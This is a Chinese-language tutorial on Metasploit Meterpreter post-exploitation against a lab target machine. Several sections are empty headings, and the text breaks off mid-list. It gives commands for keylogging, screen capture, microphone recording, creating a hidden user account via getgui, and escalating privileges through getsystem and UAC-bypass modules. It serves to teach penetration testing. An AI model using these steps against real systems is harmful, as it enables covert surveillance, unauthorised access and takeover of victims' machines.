msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上）

目录

1、文件交互指令

2、上传下载文件(windows)

3、屏幕截图(windows)

4、键盘记录（windows）

 1、先启动记录keyscan_start

2、显示键盘输入内容keyscan_dump

 3、结束监控keyscan_stop

5、创建账户（windows）

1、先看下目标靶机已存在用户

 2、使用getgui创建 一个用户名为 xiaowei  密码为 123456  的账户

6、音频录像(Android)

 7、提权(Windows)

 方法一：

方法二：

---

1、文件交互指令

---

2、上传下载文件(windows)

---

3、屏幕截图(windows)

---

4、键盘记录（windows）

 1、先启动记录keyscan_start

2、显示键盘输入内容keyscan_dump

 3、结束监控keyscan_stop

---

 

5、创建账户（windows）

1、先看下目标靶机已存在用户

 meterpreter中输入：run post/windows/gather/enum_logged_on_users

 2、使用getgui创建 一个用户名为 xiaowei  密码为 123456  的账户

run getgui -u xiaowei -p 123456
 
run getgui -u {用户名}-p {密码}

 注意：

        创建之前要是系统权限（getuid查看），要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权（获取到system）输入 getsystem就好了。

如果仍然出现错误,绕过UAC提权:

• 先输入bg，进入后台
   

•  使用这个模块use exploit/windows/local/ask
• options查看需要配置哪些模块

•  run

---

6、音频录像(Android)

record_mic -h        查看使用方法

 开始录音

---

 7、提权(Windows)

先输入getuid查看当前用户的权限，可知为普通用户。

 方法一：

getsystem

 

方法二：

使用msf模块提权

先进入msf后台bg或者background

1. 查询可以提权的模块        search bypassuac   查看提权模块
2. 选择一个适合当前系统的提权模块      use 1(如果没有成功就选择其他模块）
3. 配置模块使用参数     options （session值可以在终端直接输入session得到）
4. 可以看到需要配置session  set session   {需要提权的session id}
5. 执行提权   run
6. 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功  需要在还终端内在输入 getsystem 获取权限 

7.